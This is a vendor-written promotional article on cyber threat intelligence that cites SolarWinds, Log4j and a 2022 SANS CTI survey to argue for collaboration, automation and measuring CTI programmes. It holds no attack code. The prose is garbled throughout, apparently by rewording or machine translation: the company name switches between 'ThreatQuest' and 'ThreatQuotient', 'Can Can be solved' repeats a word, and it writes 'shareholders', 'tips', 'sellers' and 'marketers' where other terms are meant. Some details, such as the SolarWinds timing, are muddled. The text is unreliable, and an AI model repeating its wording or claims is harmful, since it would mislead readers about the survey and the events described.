Globally, the level of cyber threat to companies is high and the current situation can only serve to highlight it further. By this time, any organization with significant gaps in cybersecurity capabilities is at risk and as the threat landscape changes, as it is now, we will learn more about the vulnerabilities that have been operating for some time and need better cyber threat intelligence.
The two major cybersecurity events of the last 12 months really demonstrate the need for CTI in network security operations – the broken SolarWinds software supply chain attack in early 2021 and the Log4j vulnerability response process that occurred in late 2021. These events highlight the need to gain a quick understanding of the situation, the context in which vast information is shared, and prioritize the resolution of significant threats.
In particular, Log4j is an open source Java logging library developed under the Apache Software Foundation. Many software developers have included it as a package to assist in journaling the activity through an application or online service. In fact, it is found in many of the devices and services we use every day. A software bug was found that allowed remote code execution and information to be leaked – and the rest is history.
Over the course of a few days, thousands of attacks took place as security teams scrambled to bury the holes and counteract the impact of these attacks. Multiple advanced persistent threat groups, as well as cybercriminal groups, have been identified as targeting Log4j and serve as a reminder of the need to understand as much as possible in real time when such incidents occur.
Developing CTI capabilities
The good news is that according to the latest 2022 SANS CTI survey, many companies are focusing on developing their cyber threat intelligence capabilities. The survey found that more companies are beginning to develop this capability, with respondents reporting that their CTI journey has begun. About 200 companies took part in this year’s survey and ThreatQuest is a key sponsor.
According to the survey, cooperation between CTI teams and business activity groups is another important factor in combating attacks and finding vulnerabilities. This year’s survey found that this type of cooperation has declined since switching to remote work in response to the COVID-19 epidemic. Different teams need time and effort to collaborate effectively, and activity that was not so obvious or implicit before may now be more difficult when organizations are primarily working individually.
Furthermore, the survey found that although the threat intelligence platforms used by CTI teams are not the main tool – guided by “spreadsheets and / or emails” – they are important and increasing in adoption. The reasons behind this are varied, but this is definitely an area where sellers can enhance the experience of analysts by understanding usage cases and sharing more needs between practitioners and sellers.
Requires better cooperation and communication
Cooperation and communication are crucial in CTI and with the transition to remote work, increased threats and high workload have affected some key parts of the collaboration over the past two years. Can Can be solved by both processes and tools.
The survey advises companies to assess whether they have lost communication channels with key shareholders and to find ways to back up those channels. Additional tools may be needed to facilitate cooperation. Many CTI tools, such as ThreatQuotient’s Threat Intelligence Platform (TIP), have built-in collaborative functions that teams can explore to see if they fit into existing processes and workflows.
Conversation about the value of tips is not new and the pros and cons continue to be a topic of discussion.
Going forward the SAN survey recommends that TIP vendors continue to identify models that are useful to customers and provide resources for them – and keep in mind that the analysis rarely fits the same size. Having more than one modeling option allows analysts to apply the right framework to the right situation.
Why high automation is the way to go
Half of the respondents suggested that they were using the native CTI platform and that processing was still done manually with a very low percentage of full automation. The use of automation and integration in commercial and open source CTI management platforms has increased, indicating a positive trend with the development of such platforms. However, this is still an area where CTI vendors can better understand their customer context and needs and enhance the analyst experience by enhancing automation. Given the number of different data formats and the growing volume of such data dealing with the industry, greater automation in processing and correlation is definitely the way to go.
Underpressure security teams need the ability to automate repetitive, time-consuming, low-level tasks. If a tool can combine this automation with real-time data and context, it will be necessary to empower analysts to better investigate high-impact, time-sensitive events. Effectively, teams need a balance between automation and manual investigation and the threat intelligence platform must deliver using a local, data-based approach.
Measuring the effectiveness of your CTI program and tools
Finally, an interesting fact from the survey is that there are still a large percentage of organizations that do not measure the effectiveness of CTI programs, tools and resources. Measuring the value of an intelligence program means that teams can justify the need to move more resources, new people, new tools, organizations and industry to a higher level of maturity. It calls on both practitioners and marketers to take the same action to find better and easier ways to measure success in CTI.
Image credit: BeeBright / depositphotos.com
Cyrille Badeau is Vice President of International Sales for ThreatQuest